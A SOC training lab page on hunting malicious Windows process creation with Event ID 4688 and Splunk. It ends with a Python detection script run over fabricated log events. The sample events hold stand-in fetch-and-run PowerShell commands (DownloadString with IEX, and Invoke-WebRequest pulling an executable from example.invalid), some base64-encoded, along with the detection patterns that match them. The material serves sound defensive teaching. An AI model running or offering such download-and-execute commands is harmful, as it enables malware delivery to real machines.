CSA (312-39) SOC Simulation Lab
Master SIEM query syntax and Windows Event Log hunting. In this simulation, you will step into the role of a SOC Analyst building detection logic for malicious execution on Windows endpoints.
Scenario Context
GlobalRetail Corp's SOC has received CISA threat intelligence regarding a new ransomware variant. The threat actors are utilizing "Living off the Land" (LotL) techniques—specifically spawning encoded PowerShell commands from legitimate system processes like explorer.exe or cmd.exe.
As the Senior Threat Hunter, you are mentoring John, a junior analyst. You task him with building a baseline Splunk dashboard that monitors every process creation event across the Windows endpoint fleet while filtering out the background noise generated by computer accounts.
Security Environment
You review a sample log of the exact activity you want the Splunk query to catch:
Question
Expert Insight
What is happening?
The SOC is hunting for Execution (MITRE ATT&CK TA0002). To see what programs are running on endpoints, the SIEM must query the Windows Security log for process creation events. Because a Windows domain generates a large volume of background events from computer accounts authenticating and running system tasks, the analyst appends NOT (Account_Name=*$) to drop any account whose name ends in a dollar sign, the standard format for AD machine accounts (e.g., WORKSTATION1$). Two checks before trusting that filter: processes started by services and scheduled tasks running as SYSTEM are logged under the machine account, so the baseline deliberately hides SYSTEM-context execution and must not be reused unchanged as the hunting query; and on Windows 10 / Server 2016 and later a 4688 carries both a Subject and a Target Subject account, so confirm which of them your add-on maps to Account_Name (it may be both).
Why B is correct
EventCode=4688 is the Windows Security log ID for "A new process has been created" and is one of the most important event IDs any SOC monitors. It is not generated by default: the Advanced Audit Policy subcategory Detailed Tracking > Audit Process Creation must be enabled (success events) on the endpoints, or the query returns nothing. Combined with the machine-account filter, the query yields a clean feed of user-initiated processes across the environment. (On hosts running Sysmon, Sysmon Event ID 1 is the equivalent process creation source.)
Why the other options are wrong
A (4678): Not a process creation event ID and not one a SOC would monitor for execution. (The nearby real IDs are 4670, "Permissions on an object were changed", and 4672, "Special privileges assigned to new logon".)
C & D (3688 / 5688): These event IDs do not exist in the standard, modern Windows Security auditing schema for process execution.
MINI LESSON: Command Line Auditing (Event ID 4688)
Audit Process Creation by itself records that a process started (e.g., powershell.exe) and who started it, but not what arguments it was given. A mature SOC also enables the Group Policy setting "Include command line in process creation events" (Computer Configuration > Administrative Templates > System > Audit Process Creation). Be aware that command lines can carry secrets passed as arguments (passwords handed to net use, runas, or scripts), so the resulting events need the same access controls as any other credential-bearing log.
Once enabled, the process command line is added to the 4688 event (the Splunk Add-on for Windows extracts it as Process_Command_Line; CommandLine is the Sysmon field name, so check which one your index actually carries). Without it you only know PowerShell ran; with it you can search for malicious arguments:
index=windows EventCode=4688 CommandLine IN ("*-enc*", "*-EncodedCommand*", "*Invoke-WebRequest*")
This turns Event ID 4688 from a bare visibility source into a command-line hunting source, as long as the patterns are tuned. "*-enc*" also matches "-encoding" and any path containing "-enc", while the short spellings -e and -ec that PowerShell accepts for -EncodedCommand are missed entirely. Treat the list above as a starting point, decode the base64 of every hit so you see the script rather than a blob, and validate it against known-good administrative scripts before alerting.
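The following is an added example, not code from the lab or from Splunk: both searches on this page (the baseline with the machine-account filter from the Expert Insight, and the command-line hunt from the mini lesson) re-implemented in Python and run over constructed 4688 events so the logic can be checked offline. It assumes Splunk Add-on for Windows style field names (EventCode, Account_Name, New_Process_Name, Creator_Process_Name, Process_Command_Line); the log lines, account names, hostnames and URLs are fabricated. It goes beyond the page in three ways: it accepts every spelling of -EncodedCommand that PowerShell itself accepts (-e, -ec, -en, -enc, and so on), it decodes the base64 UTF-16LE payload, and it keeps machine-account events in the hunt because encoded PowerShell run as SYSTEM is exactly what the baseline's NOT *$ clause would hide.

```python
"""Added example (not from the lab): the baseline and the command-line hunt in Python,
run over constructed 4688 events.  Field names assume the Splunk Add-on for Windows."""
import base64
import binascii
import re

# Every spelling PowerShell accepts for -EncodedCommand: the documented short forms -e and
# -ec plus any unambiguous prefix of the full name (-en, -enc, -enco, ... -encodedcommand).
ENCODED_SWITCHES = {"-e", "-ec"} | {"-" + "encodedcommand"[:n] for n in range(2, 15)}

# Clear-text indicators in the spirit of the lesson's IN(...) list, matched case-insensitively.
SUSPICIOUS_SUBSTRINGS = ("invoke-webrequest", "downloadstring")

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line):
    """Turn one 'Field=value Field2="quoted value"' line into a dict (quotes stripped)."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in _KV.findall(line)}


def is_machine_account(account):
    """AD computer accounts end in '$' (WKS01$): this is the NOT Account_Name=*$ clause."""
    return account.endswith("$")


def baseline(events):
    """EventCode=4688 NOT Account_Name=*$ : user-context process creations only."""
    return [e for e in events
            if e.get("EventCode") == "4688" and not is_machine_account(e.get("Account_Name", ""))]


def encode_for_powershell(script):
    """Build an -EncodedCommand argument the way powershell.exe expects it: base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(token):
    """Reverse of encode_for_powershell; None if the token is not valid base64 UTF-16LE."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def inspect_command_line(cmdline):
    """Return (reason, decoded_script_or_None) for a suspicious command line, else None.

    A switch only counts as -EncodedCommand if the following token really decodes, so an
    unrelated program's own '-enc' switch does not fire (the page's '*-enc*' wildcard would)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_SWITCHES:
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                return ("encoded PowerShell via " + tok, decoded)
    lowered = cmdline.lower()
    for needle in SUSPICIOUS_SUBSTRINGS:
        if needle in lowered:
            return ("suspicious argument " + needle, None)
    return None


def hunt(events, exclude_machine_accounts=False):
    """The mini-lesson search: 4688 plus command-line indicators.

    Machine accounts are kept by default: encoded PowerShell launched as SYSTEM (a service or
    scheduled task) is what the ransomware scenario must catch, and NOT *$ would hide it."""
    pool = baseline(events) if exclude_machine_accounts else \
        [e for e in events if e.get("EventCode") == "4688"]
    findings = []
    for e in pool:
        hit = inspect_command_line(e.get("Process_Command_Line", ""))
        if hit:
            reason, decoded = hit
            findings.append({"account": e.get("Account_Name"), "parent": e.get("Creator_Process_Name"),
                             "process": e.get("New_Process_Name"), "reason": reason, "decoded": decoded})
    return findings


# --- constructed sample events (fabricated, not real telemetry) -------------------------
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
B64 = encode_for_powershell(PAYLOAD)
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

SAMPLE_LOG = [
    # 1. service start in SYSTEM context, logged under the machine account
    'EventCode=4688 Account_Name=WKS01$ New_Process_Name=C:\\Windows\\System32\\svchost.exe '
    'Creator_Process_Name=C:\\Windows\\System32\\services.exe Process_Command_Line="svchost.exe -k netsvcs"',
    # 2. ordinary user activity
    'EventCode=4688 Account_Name=jdoe New_Process_Name=C:\\Windows\\System32\\notepad.exe '
    'Creator_Process_Name=C:\\Windows\\explorer.exe Process_Command_Line="notepad.exe C:\\Users\\jdoe\\todo.txt"',
    # 3. the scenario: encoded PowerShell spawned from explorer.exe
    'EventCode=4688 Account_Name=jdoe New_Process_Name=' + PS + ' Creator_Process_Name=C:\\Windows\\explorer.exe '
    'Process_Command_Line="powershell.exe -nop -w hidden -enc ' + B64 + '"',
    # 4. same thing from cmd.exe using the short -ec spelling that '*-enc*' misses
    'EventCode=4688 Account_Name=asmith New_Process_Name=' + PS + ' Creator_Process_Name=C:\\Windows\\System32\\cmd.exe '
    'Process_Command_Line="powershell -ec ' + B64 + '"',
    # 5. clear-text downloader
    'EventCode=4688 Account_Name=jdoe New_Process_Name=' + PS + ' Creator_Process_Name=C:\\Windows\\explorer.exe '
    'Process_Command_Line="powershell.exe -Command Invoke-WebRequest -Uri http://example.invalid/x.exe -OutFile C:\\Users\\jdoe\\x.exe"',
    # 6. encoded PowerShell from a scheduled task running as SYSTEM: dropped by NOT *$
    'EventCode=4688 Account_Name=WKS02$ New_Process_Name=' + PS + ' Creator_Process_Name=C:\\Windows\\System32\\svchost.exe '
    'Process_Command_Line="powershell.exe -e ' + encode_for_powershell("Start-Sleep 1; Get-Date") + '"',
    # 7. benign program whose own switch happens to be -enc (a '*-enc*' false positive)
    'EventCode=4688 Account_Name=jdoe New_Process_Name=C:\\Tools\\video-encoder.exe '
    'Creator_Process_Name=C:\\Windows\\explorer.exe Process_Command_Line="video-encoder.exe -enc h264 in.mp4"',
]
EVENTS = [parse_event(line) for line in SAMPLE_LOG]

if __name__ == "__main__":
    print(len(baseline(EVENTS)), "user-context events in the baseline")
    for f in hunt(EVENTS):
        print(f["account"], f["parent"], "->", f["process"], "|", f["reason"], "|", f["decoded"])
```

Running it shows five events in the baseline (the two machine-account events are dropped) and four hunt findings, including the SYSTEM-context scheduled task under WKS02$ that the baseline would never surface; passing exclude_machine_accounts=True reproduces the page's query literally and loses that finding. Event 7 is the reason the code demands a decodable payload after the switch rather than a bare "-enc" substring match.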